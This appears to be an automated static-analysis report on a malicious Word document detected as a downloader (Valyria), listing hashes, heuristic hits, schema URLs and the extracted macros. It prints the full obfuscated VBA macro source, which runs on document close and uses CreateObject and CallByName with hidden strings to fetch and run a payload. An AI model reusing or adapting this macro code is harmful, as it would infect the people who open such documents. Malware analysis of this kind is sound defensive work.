Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 201a94a1d74c9839…

MALICIOUS

Office (OOXML)

82.4 KB Created: 2021-01-29 09:05:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-09
MD5: 3afd2771cc7fe087a243a06603cd99ba SHA-1: 37206090abcab491dd76fa8d0fd7e500ad83f1af SHA-256: 201a94a1d74c98399d8f896b10c1876ebef2394e4fcc4633f27eb7e1dfecf805
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fnt = CreateObject(UserForm1.jlx & UserForm1.fa)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set cu = CallByName(fnt.Workbooks, UserForm1.kr & UserForm1.ko, 1, UserForm2.ComboBox1, , , , UserForm1.wtj)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6947 bytes
SHA-256: f94de65f4f4dade478adec16af2db70f0b9b8560e7ca34bb6a2a32df555f352c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public eg, nz, ha, nn, jz, fnt, gi, b1, cn, ti, i6, p6, b9, c0, qr, js

Sub Document_Close()

dk = UserForm2.ComboBox14

ra

End Sub

Sub ra()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set fnt = CreateObject(UserForm1.jlx & UserForm1.fa)

fnt.DisplayAlerts = False

gl = UserForm2.ComboBox14

ap = 1301

qo = 0

Err.Number = 0

While ap <> 0 And qo < 32

Set cu = CallByName(fnt.Workbooks, UserForm1.kr & UserForm1.ko, 1, UserForm2.ComboBox1, , , , UserForm1.wtj)

ap = Err.Number

qo = qo + 16

Wend

lf = UserForm2.ComboBox3

If ap <> 0 Then

ErrHandler:

nxu = CallByName(Application, UserForm1.hf & UserForm1.fk, 2)

If nxu <> False Then

Set kk = CreateObject(UserForm1.xy & UserForm1.zpb)

ev = UserForm2.ComboBox6

CallByName kk.Documents, UserForm1.kr & UserForm1.ko, 1, ActiveDocument.FullName, , True

r8 = UserForm2.ComboBox18

x9 = UserForm2.ComboBox21

CallByName kk, UserForm1.gz & UserForm1.rc, 1, Now + TimeSerial(0, 0, 2), UserForm1.kq & UserForm1.sa & "ra"

Else

w = UserForm2.ComboBox5

CallByName Application, UserForm1.gz & UserForm1.rc, 1, Now + TimeSerial(0, 0, 17), UserForm1.kq & UserForm1.sa & "ra"

End If

fnt.Quit

y7x = UserForm2.ComboBox10

Exit Sub

End If

Dim o6

Set o6 = fnt.sheets(1)

kqo = "'"

cb7 = UserForm2.ComboBox28

js = fnt.sheets(5).Cells(1, 1)

If Len(js) < 1 Then

j7 = UserForm2.ComboBox3

If fnt.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

Else

Exit Sub

End If

End If

f6 = o6.Cells(94, 28).Value

o9j = UserForm2.ComboBox22

nk = fnt.sheets(1).Cells(111, 27).Value

ti = fnt.sheets(1).Cells(122, 34).Value

i6 = fnt.sheets(2).Cells(21, 55).Value

jz = fnt.sheets(2).Cells(76, 31).Value

k = fnt.sheets(2).Cells(30, 59).Value

r5 = fnt.sheets(1).Cells(101, 9).Value

y1 = fnt.sheets(3).Cells(54, 34).Value

q0 = fnt.sheets(2).Cells(48, 13).Value

hq = o6.Cells(29, 52).Value

hd = UserForm2.ComboBox5

b9 = fnt.sheets(2).Cells(126, 10).Value

gi = fnt.sheets(1).Cells(109, 14).Value

cn = fnt.sheets(3).Cells(87, 42).Value

sj = fnt.sheets(3).Cells(4, 18).Value

cln = fnt.sheets(2).Cells(16, 49).Value

p6 = fnt.sheets(1).Cells(124, 10).Value

ss7 = UserForm2.ComboBox16

my = o6.Cells(94, 10).Value

c3 = fnt.sheets(2).Cells(70, 1).Value

eg = fnt.sheets(3).Cells(38, 13).Value

o1 = fnt.sheets(3).Cells(93, 33).Value

gm = o6.Cells(118, 55).Value

b1 = fnt.sheets(3).Cells(112, 29).Value

nz = fnt.sheets(3).Cells(136, 42).Value

u = fnt.sheets(3).Cells(87, 20).Value

rh = fnt.sheets(2).Cells(63, 33).Value

qr = ""

Set Sh1 = fnt.sheets(4)

hl = 1

go = True

While go

g5 = Sh1.Cells(hl, 1).Value

If Len(g5) < 1 Then

go = False

Else

qr = qr & g5

End If

hl = hl + 1

Wend

lr = CallByName(fnt, hq, 2)

h9 = UserForm2.ComboBox10

UserForm1.na.Value = r5 & lr & c3

UserForm1.c.Value = nk

cw = UserForm2.ComboBox22

CallByName CreateObject(rh), gm, 1, UserForm1.na, my, UserForm1.c

m6 = UserForm2.ComboBox17

ao = UserForm2.ComboBox9

Set q3 = CreateObject(f6)

Set ld = CallByName(q3, k, 2)

Set eu = CallByName(ld, u, 1)

ly = UserForm2.ComboBox25

Set cn = CallByName(q3, cn, 2)

Set nn = q3

gc = UserForm2.ComboBox28

UserForm5.ComboBox1 = "ve"

Set eg = CallByName(c0, eg, 2)

b1 = CallByName(eg, b1, 2)

p3 = UserForm2.ComboBox16

UserForm1.qt.Value = o1 & y1

UserForm3.ComboBox1 = q0

UserForm1.qt.Value = sj

UserForm4.ComboBox1 = UserForm3.ComboBox1

q = UserForm2.ComboBox22

UserForm3.ComboBox1 = b1

q3 = odc

cu = xw

o6 = zo5

ld = d8m

eu = iq

cn = fp

ti = aw

i6 = a4

c0 = r2

eg = m5

nn = zm

DoEvents

CallByName fnt, cln, 1

fnt = kn

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{5F03CC38-4910-4B53-A27F-049BAAB0C91C}{D09A6E5E-D60F-4682-95A7-5A4CABE3107D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{916BFE95-7E79-46B2-AFC2-606047916C7B}{2853A585-1DC5-4863-B940-FB39525F60E3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 yq = UserForm2.Controls.Count - 1
 
 
 
 

 d4 = ""
 For t38 = 1 To yq Step 2
 d4 = d4 & UserForm2.Controls.Item(t38)
 Next

 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem d4
 ComboBox1.AddItem "gz"
 
 
 
 
 

rg = UserForm2.ComboBox23

 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{AC3927AA-67EE-4F75-8DD3-2C03E64F33B2}{1DA00FA7-CDD1-4E62-9621-DAA58A507419}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.eg, ActiveDocument.gi, VbMethod, 1, ActiveDocument.b1
 CallByName ActiveDocument.eg, ActiveDocument.nz, VbMethod, UserForm1.qt.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{440EFA45-E9F5-40AB-8A8A-9F3A2E4C3350}{668F765A-8536-4AA1-80D0-FAB7838C85BF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.nn, ActiveDocument.jz, VbMethod, UserForm1.qt.Value, ActiveDocument.qr, ActiveDocument.js
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{42D99453-32D8-4923-BC10-E8AE8CF5BE09}{3774F433-FA61-4874-95FC-F573E5AC10AF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.ti = CallByName(ActiveDocument.cn, ActiveDocument.ti, VbGet)
 Set ActiveDocument.i6 = CallByName(ActiveDocument.ti, ActiveDocument.i6, VbGet)
 Set ActiveDocument.c0 = CallByName(ActiveDocument.i6, ActiveDocument.p6, VbMethod, ActiveDocument.b9)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 51200 bytes
SHA-256: b0e817c7a32b6159d4e10014c523ab86a57e9af1ca37f978daa87fd59e787287
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.